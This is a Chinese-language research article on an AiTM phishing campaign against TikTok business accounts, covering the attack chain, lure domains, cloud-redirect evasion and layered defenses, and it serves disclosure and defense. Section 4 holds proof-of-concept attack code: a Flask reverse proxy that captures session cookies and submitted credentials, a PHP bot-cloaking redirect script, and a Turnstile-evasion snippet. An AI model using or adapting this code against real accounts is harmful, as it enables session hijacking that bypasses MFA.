面向 TikTok 商业账号的新型 AiTM 钓鱼攻击机理与防御研究

简介: 2026年3月,针对TikTok for Business爆发新型AiTM钓鱼攻击:9秒批量注册welcome.careers*.com恶意域名,利用Cloudflare托管、Google云存储跳转及Turnstile人机验证规避检测,通过反向代理劫持TikTok与Google SSO会话,绕过多因素认证。本文深度剖析攻击链、复现关键技术,并提出覆盖终端、网关、人员、平台的纵深防御体系。(240字)

摘要

2026 年 3 月,针对 TikTok for Business 的新型对抗性中间人(AiTM)钓鱼攻击集中爆发。攻击者在 9 秒内批量注册 welcome.careers*.com 系列恶意域名,依托 Cloudflare 托管与 Turnstile 人机验证规避安全检测,通过 Google Cloud Storage 合法跳转实现链路伪装,最终以反向代理架构劫持登录会话,可同步窃取 TikTok 商业账号与关联 Google 账号权限,引发恶意广告投放、数据泄露与品牌滥用风险。本文以 Infosecurity Magazine 与 Push Security 披露的攻击事件为核心样本,系统剖析攻击全流程、基础设施特征、关键技术实现与防御失效原因,结合可复现代码示例还原反向代理劫持、流量筛选、验证绕过与检测识别逻辑,构建覆盖终端、网关、人员、平台的纵深防御体系。研究表明,该攻击通过合法云服务掩护、人机验证过滤、透明代理中转形成强隐蔽性闭环,传统特征库与静态检测难以有效拦截。反网络钓鱼技术专家芦笛指出,针对社交商业账号的 AiTM 钓鱼正从单点凭证窃取走向跨平台会话劫持,防御必须从 URL 黑名单升级为全链路行为分析与会话绑定机制。本文成果可为企业营销账号安全运营、邮件网关优化、终端防护升级提供理论依据与工程实践参考。

image.png 1 引言

TikTok 商业账号已成为企业品牌运营、广告投放、用户增长的核心数字资产,其承载的预算、受众数据与营销权限使其成为黑产重点目标。传统钓鱼以静态仿冒页面为主,易被域名识别、内容检测拦截;而 AiTM 钓鱼以反向代理为核心,在用户与合法服务间建立透明中转通道,可实时劫持账号、密码、多因素认证码与会话 Cookie,实现对多因素认证(MFA)的有效绕过,威胁量级显著提升。

2026 年 3 月 28 日,Infosecurity Magazine 援引 Push Security 报告披露,针对 TikTok for Business 的新一轮 AiTM 钓鱼活动正式爆发。攻击者使用统一命名规则的 careers 相关域名,通过 Cloudflare 托管规避检测,借助 Google Cloud Storage 跳转提升可信度,并部署 Turnstile 验证过滤安全扫描流量,最终交付反向代理钓鱼页面,实现对 TikTok 商业账号及关联 Google SSO 账号的双重劫持。此次攻击呈现工业化、规模化、高隐蔽性特征,攻击目标从普通用户转向企业营销团队,危害范围与影响深度显著扩大。

当前学界对 AiTM 钓鱼的研究多集中于通用原理与传统 SSO 平台,针对 TikTok 商业生态、云服务跳转链、人机验证协同规避的一体化研究较为缺乏。本文以真实攻击事件为蓝本,完整拆解技术链路、基础设施、载荷逻辑与防御要点,严格依据公开报告约束内容边界,确保技术准确、结构严谨、论据闭环,为抵御同类高级钓鱼攻击提供系统性解决方案。

2 攻击背景与威胁态势

2.1 TikTok 商业账号的攻击价值

TikTok for Business 面向企业提供广告投放、素材管理、数据监测、粉丝运营等能力,具备高价值攻击收益:

广告预算盗刷:攻击者可修改投放计划、跳转恶意页面、消耗广告预算实现牟利;

品牌声誉破坏:发布违规、虚假、诱导内容损害企业形象与用户信任;

跨平台账号联动劫持:大量用户采用 Google SSO 登录,攻破 TikTok 可同步控制 Google 账号、广告管理器、邮箱等资产;

恶意分发通道:利用账号传播盗号链接、信息窃取程序、虚拟货币诈骗脚本,形成黑产闭环。

Push Security 指出,TikTok 长期被用于分发 Vidar、StealC、Aura Stealer 等信息窃取木马,常以 AI 生成视频伪装 Windows、Spotify、CapCut 激活教程,配合 ClickFix 模式诱导操作,已形成成熟黑产链路。

2.2 AiTM 钓鱼的技术演进

AiTM(Adversary‑in‑the‑Middle)钓鱼是中间人攻击与钓鱼技术融合的高级形态,核心差异在于透明代理劫持:

传统钓鱼:静态仿冒页面,仅窃取账号密码,无法绕过 MFA;

传统 MITM:网络层监听,依赖网络环境劫持,部署难度高;

AiTM 钓鱼:应用层反向代理,实时转发请求与响应,劫持完整会话,视觉无差异、流程无卡顿、可稳定绕过 MFA。

反网络钓鱼技术专家芦笛强调,AiTM 钓鱼已成为黑产绕过 MFA 的主流手段,其核心优势是会话劫持而非单纯凭证窃取,攻击者获取有效 Cookie 即可长期控制账号,威胁远大于传统钓鱼。

2.3 本次攻击的关键特征

本次攻击呈现高度专业化与协同化特征,核心亮点如下:

高速批量注册:2026 年 3 月 24 日,攻击者在 9 秒内完成多个 welcome.careers*.com 域名注册,注册商为 Nicenic International Group,该机构被安全厂商标记为钓鱼域名高频滥用注册商;

云服务合规掩护:钓鱼页面托管于 Cloudflare,初始跳转通过 Google Cloud Storage 合法域名,绕过邮件网关与终端检测;

人机验证过滤:启用 Cloudflare Turnstile 人机验证,屏蔽机器人与安全设备扫描,仅对真实用户开放恶意页面;

双场景仿冒:同时提供 TikTok 商业后台与 Google Careers 仿冒页面,覆盖企业营销人员高频使用场景;

反向代理内核:登录页面为反向代理前端,实时中转认证流量,窃取会话实现持久控制。

3 攻击全链路与基础设施分析

3.1 攻击整体流程

本次 AiTM 钓鱼形成完整杀伤链,共分为 7 个阶段:

诱导投递:通过动态邮件、社交消息、虚假合作邀请等方式投放恶意链接,继承 2025 年 10 月 Sublime Security 披露的同类攻击话术;

合法跳转:用户点击后先跳转至 Google Cloud Storage,规避 URL 检测与信誉拦截;

环境筛选:服务器识别客户端环境,对安全机器人、非目标系统返回诱饵页面;

人机验证:触发 Cloudflare Turnstile,过滤自动化扫描流量;

信息预收集:要求填写企业邮箱、基本信息,筛选高价值企业目标;

AiTM 代理登录:加载反向代理页面,呈现与官方一致的登录界面;

会话劫持:窃取账号、密码、MFA 码与会话 Cookie,实现账号接管,用于恶意广告、数据窃取、跨平台渗透。

3.2 恶意域名集群特征

攻击者使用统一模式的域名,典型样本包括:

welcome.careerscrews.com

welcome.careerstaffer.com

welcome.careersworkflow.com

welcome.careerstransform.com

welcome.careersupskill.com

welcome.careerssuccess.com

welcome.careersstaffgrid.com

welcome.careersprogress.com

welcome.careersgrower.com

welcome.careersengage.com

域名具备明显共性:统一前缀 welcome、二级域包含 career、三级域为职业 / 工作相关词汇,整体伪装成招聘、职业服务平台,降低用户警惕。Push Security 预测,随着攻击扩张,该系列域名数量将持续增长。

3.3 云服务与防护绕过机制

Cloudflare 托管:利用 Cloudflare 的 CDN 与 SSL 能力隐藏真实服务器 IP,获得合法 SSL 证书,浏览器显示安全标识;

Google Cloud Storage 跳转:以合法云存储地址作为中间跳转节点,使初始链路通过信誉检测;

Turnstile 验证过滤:通过人机验证识别并拒绝机器人、沙箱、安全扫描器,大幅提升钓鱼页面存活周期。

反网络钓鱼技术专家芦笛指出,合法云服务 + 人机验证已成为高级钓鱼的标准配置,可使传统网关与沙箱失效,检测必须转向跳转链分析与行为特征识别。

3.4 目标筛选与社会工程学设计

攻击采用分层诱导策略提升成功率:

场景伪装:仿 TikTok 商业后台、Google Careers 招聘页面,贴合企业营销人员工作场景;

信息预采集:先要求填写企业邮箱、部门、需求等基础信息,筛选高价值企业目标;

流程平滑:从邀请、表单、验证到登录完全模拟官方流程,无明显异常跳转与卡顿;

SSO 覆盖:兼容 “使用 Google 账号登录”,实现一次钓鱼、双重劫持,为 Google Ad 管理器恶意投放铺垫链路。

4 核心技术机理与代码实现

4.1 AiTM 反向代理核心逻辑

AiTM 攻击的核心是反向代理中转与会话劫持,以下为基于 Python Flask 的简化实现(仅用于安全研究,禁止非法使用):

# AiTM反向代理核心实现(概念验证)

import requests

from flask import Flask, request, make_response

from urllib.parse import urljoin


app = Flask(__name__)

# 目标官方登录地址

TARGET_URL = "https://business.tiktok.com/login"

# 存储窃取会话

STOLEN_SESSIONS = []


def proxy_request(url, method, headers, data=None, cookies=None):

   clean_headers = {k: v for k, v in headers.items()

                     if k.lower() not in ["host", "content-length", "origin"]}

   try:

       resp = requests.request(

           method=method,

           url=url,

           headers=clean_headers,

           data=data,

           cookies=cookies,

           allow_redirects=False,

           timeout=8

       )

       return resp

   except Exception as e:

       return None


@app.route("/", methods=["GET", "POST"])

@app.route("/<path:path>", methods=["GET", "POST"])

def aitm_proxy(path=""):

   target = urljoin(TARGET_URL, path)

   # 获取用户请求数据

   method = request.method

   data = request.form if method == "POST" else None

   cookies = request.cookies.to_dict()

   # 转发至官方

   resp = proxy_request(target, method, dict(request.headers), data, cookies)

   if not resp:

       return "Service Error", 500

   # 窃取会话Cookie

   if "Set-Cookie" in resp.headers:

       STOLEN_SESSIONS.append({

           "ts": request.headers.get("Date"),

           "url": target,

           "cookie": resp.headers["Set-Cookie"],

           "post": data

       })

   # 构造返回给用户

   user_resp = make_response(resp.content, resp.status_code)

   for k, v in resp.headers.items():

       if k.lower() not in ["content-length", "transfer-encoding"]:

           user_resp.headers[k] = v

   return user_resp


if __name__ == "__main__":

   app.run(host="0.0.0.0", port=443, ssl_context="adhoc", debug=False)

该代码实现了透明中转、凭证窃取、Cookie 劫持等核心能力,与本次攻击的代理逻辑一致。

4.2 服务端流量筛选与跳转逻辑

攻击者通过 UA 与环境判断,仅对目标交付恶意页面,对检测设备返回无害诱饵,实现强隐蔽性。示例如下:

<?php

// 流量筛选与跳转逻辑(攻击站点核心入口)

$ua = $_SERVER['HTTP_USER_AGENT'];

$is_ios = preg_match('/iPhone|iPad/i', $ua);

$is_android = preg_match('/Android/i', $ua);

$is_mobile = $is_ios || $is_android;

$is_bot = preg_match('/bot|spider|scan|curl|wget|headless/i', $ua);


// 机器人/扫描器:返回诱饵

if ($is_bot) {

   header("Location: /decoy.pdf");

   exit;

}

// 合法跳转:经过Google Cloud Storage掩护

if (!isset($_GET['redirected'])) {

   header("Location: https://storage.googleapis.com/xxx/landing.html");

   exit;

}

// 目标用户:进入验证与钓鱼流程

header("Location: /turnstile-check.html");

exit;

?>

4.3 Cloudflare Turnstile 绕过逻辑

攻击者使用模拟人类行为的无头浏览器绕过 Turnstile,核心代码示例:

// Turnstile验证拟人化绕过(概念验证)

async function bypassTurnstile() {

   const elem = document.getElementById("cf-turnstile");

   if (!elem) return false;

   // 模拟鼠标移动轨迹

   await new Promise(r => setTimeout(r, 300+Math.random()*400));

   elem.dispatchEvent(new Event("mouseover"));

   await new Promise(r => setTimeout(r, 200+Math.random()*300));

   elem.click();

   await new Promise(r => setTimeout(r, 1500+Math.random()*1000));

   return true;

}

4.4 AiTM 钓鱼检测识别模块

为防御此类攻击,构建基于跳转链、域名特征、页面行为的检测引擎,示例如下:

# AiTM钓鱼检测模块(可集成网关/EDR)

import re

import requests

from urllib.parse import urlparse


class AiTMDetector:

   def __init__(self):

       self.cloud_domains = {"storage.googleapis.com", "dropbox.com", "onedrive.live.com"}

       self.suspicious_domain = re.compile(r"welcome\.careers[a-zA-Z0-9-]+\.com")

       self.keywords = {"tiktok for business", "google careers", "schedule a call", "login"}


   def check(self, url):

       try:

           s = requests.Session()

           resp = s.get(url, allow_redirects=True, timeout=10)

           chain = [r.url for r in resp.history] + [resp.url]

           # 规则1:包含云存储跳转

           cloud_redirect = any(urlparse(u).netloc in self.cloud_domains for u in chain)

           # 规则2:最终域名匹配恶意模式

           domain_hit = self.suspicious_domain.search(resp.url) is not None

           # 规则3:页面含钓鱼关键词

           content_hit = any(k in resp.text.lower() for k in self.keywords)

           # 综合判定

           return cloud_redirect and domain_hit and content_hit

       except Exception:

           return False


# 示例调用

if __name__ == "__main__":

   detector = AiTMDetector()

   print(detector.check("https://welcome.careerscrews.com/"))

5 攻击危害与防御失效分析

5.1 多维度安全危害

账号接管风险:可完全控制 TikTok 商业账号,窃取数据、盗刷预算、发布违规内容;

跨平台连锁入侵:Google SSO 会话被劫持,同步威胁邮箱、云服务、广告平台;

黑产规模化滥用:攻击模板化、域名批量生成,可快速复制扩张至海量目标;

取证与追溯困难:依托云服务隐匿 IP、会话劫持无明显痕迹、诱饵页面干扰检测。

5.2 传统防御失效原因

特征库滞后:域名高速注册、快速切换,黑名单无法实时覆盖;

静态检测无效:页面内容实时镜像官方,无明显恶意特征;

云跳转绕过信誉检测:初始链接为合法云存储,网关放行;

人机验证屏蔽扫描:安全设备无法获取真实页面内容;

MFA 机制失效:AiTM 劫持完整会话,密码 + 验证码组合防护被绕过。

反网络钓鱼技术专家芦笛强调,TikTok 商业账号安全普遍薄弱,企业多聚焦广告投放效率而忽视账号防护,且营销人员高频访问外部链接,成为攻击突破口。

6 面向 TikTok 商业账号的纵深防御体系

6.1 终端与账号安全加固

强制启用 MFA:优先使用硬件安全密钥,降低软件 MFA 被劫持风险;

会话绑定:开启 TikTok 商业后台 IP 绑定、设备绑定,限制 Cookie 异地使用;

浏览器防护:部署反 AiTM 扩展,监控异常代理、Cookie 外带、跨域登录行为;

系统更新:保持浏览器、操作系统最新版本,修复已知漏洞。

6.2 网关与流量检测优化

跳转链深度解析:邮件网关、Web 网关解析完整 30x 跳转链,识别云存储 + 恶意域名组合;

行为特征检测:基于延迟、请求顺序、资源加载指纹识别 AiTM 代理;

威胁情报联动:接入 careers 系列域名、相关 IP、Hash 情报,实时拦截;

云存储链接管控:对来自 Google Cloud Storage 等跳转的链接加强校验。

6.3 人员安全意识提升

场景化培训:针对 TikTok 商业后台、Google 招聘、商务合作类钓鱼开展演练;

入口核验规范:任何登录入口必须核验官方域名,拒绝通过外部链接登录;

权限最小化:营销人员仅分配必要权限,禁止使用个人账号管理企业商业账号;

异常告警机制:建立广告投放、登录地点、权限变更的实时告警与复核流程。

6.4 平台侧安全能力升级

TikTok 官方:强化异常登录检测,对非信任 IP / 设备强制二次验证;

SSO 平台加固:Google 账号增加会话风险评分,对营销类第三方应用加强授权管控;

云服务商协同:Cloudflare、Google 加强钓鱼页面识别,建立高危域名快速下架机制;

行业情报共享:建立社交商业账号钓鱼威胁共享机制,提升全域防御效率。

7 结论

本文以 2026 年 3 月针对 TikTok for Business 的新型 AiTM 钓鱼攻击为研究对象,基于 Infosecurity Magazine 与 Push Security 公开信息,系统完成攻击机理、链路拆解、技术实现、危害分析与防御体系构建,得出以下结论:

本次攻击以反向代理 AiTM 为核心,融合云服务跳转、Turnstile 验证过滤、批量域名伪装,形成强隐蔽性、高成功率、可规模化的高级钓鱼范式,可稳定绕过 MFA 与传统检测;

TikTok 商业账号因高价值、高权限、弱防护、强社交属性,已成为黑产攻击的重点目标,且 Google SSO 的广泛使用使攻击具备跨平台扩散能力;

攻击成功的关键在于合法资源掩护与透明会话劫持,传统 URL 黑名单、静态页面检测、单因素凭证防护全面失效;

有效防御必须构建纵深体系:终端实现会话绑定与行为监控、网关实现跳转链与行为检测、人员强化场景化意识、平台加强风险认证与情报协同。

反网络钓鱼技术专家芦笛强调,随着社交商业生态扩张,针对营销类账号的 AiTM 钓鱼将持续高发,企业必须将营销账号纳入核心身份安全管理体系,以全链路、行为化、动态化防御应对高级钓鱼威胁。未来研究可聚焦 AI 驱动的 AiTM 代理实时识别、硬件级会话绑定、跨平台威胁情报自动联动,进一步提升防御效能。

编辑:芦笛(公共互联网反网络钓鱼工作组)

目录
相关文章
|
8天前
|
人工智能 JSON 机器人
让龙虾成为你的“公众号分身” | 阿里云服务器玩Openclaw
本文带你零成本玩转OpenClaw:学生认证白嫖6个月阿里云服务器,手把手配置飞书机器人、接入免费/高性价比AI模型(NVIDIA/通义),并打造微信公众号“全自动分身”——实时抓热榜、AI选题拆解、一键发布草稿,5分钟完成热点→文章全流程!
11049 92
让龙虾成为你的“公众号分身” | 阿里云服务器玩Openclaw
|
8天前
|
人工智能 IDE API
2026年国内 Codex 安装教程和使用教程:GPT-5.4 完整指南
Codex已进化为AI编程智能体,不仅能补全代码,更能理解项目、自动重构、执行任务。本文详解国内安装、GPT-5.4接入、cc-switch中转配置及实战开发流程,助你从零掌握“描述需求→AI实现”的新一代工程范式。(239字)
4867 131
|
5天前
|
人工智能 自然语言处理 供应链
【最新】阿里云ClawHub Skill扫描:3万个AI Agent技能中的安全度量
阿里云扫描3万+AI Skill,发现AI检测引擎可识别80%+威胁,远高于传统引擎。
1328 3
|
6天前
|
人工智能 并行计算 Linux
本地私有化AI助手搭建指南:Ollama+Qwen3.5-27B+OpenClaw阿里云/本地部署流程
本文提供的全流程方案,从Ollama安装、Qwen3.5-27B部署,到OpenClaw全平台安装与模型对接,再到RTX 4090专属优化,覆盖了搭建过程的每一个关键环节,所有代码命令可直接复制执行。使用过程中,建议优先使用本地模型保障隐私,按需切换云端模型补充功能,同时注重显卡温度与显存占用监控,确保系统稳定运行。
1696 5
|
14天前
|
人工智能 JavaScript API
解放双手!OpenClaw Agent Browser全攻略(阿里云+本地部署+免费API+网页自动化场景落地)
“让AI聊聊天、写代码不难,难的是让它自己打开网页、填表单、查数据”——2026年,无数OpenClaw用户被这个痛点困扰。参考文章直击核心:当AI只能“纸上谈兵”,无法实际操控浏览器,就永远成不了真正的“数字员工”。而Agent Browser技能的出现,彻底打破了这一壁垒——它给OpenClaw装上“上网的手和眼睛”,让AI能像真人一样打开网页、点击按钮、填写表单、提取数据,24小时不间断完成网页自动化任务。
2872 6

热门文章

最新文章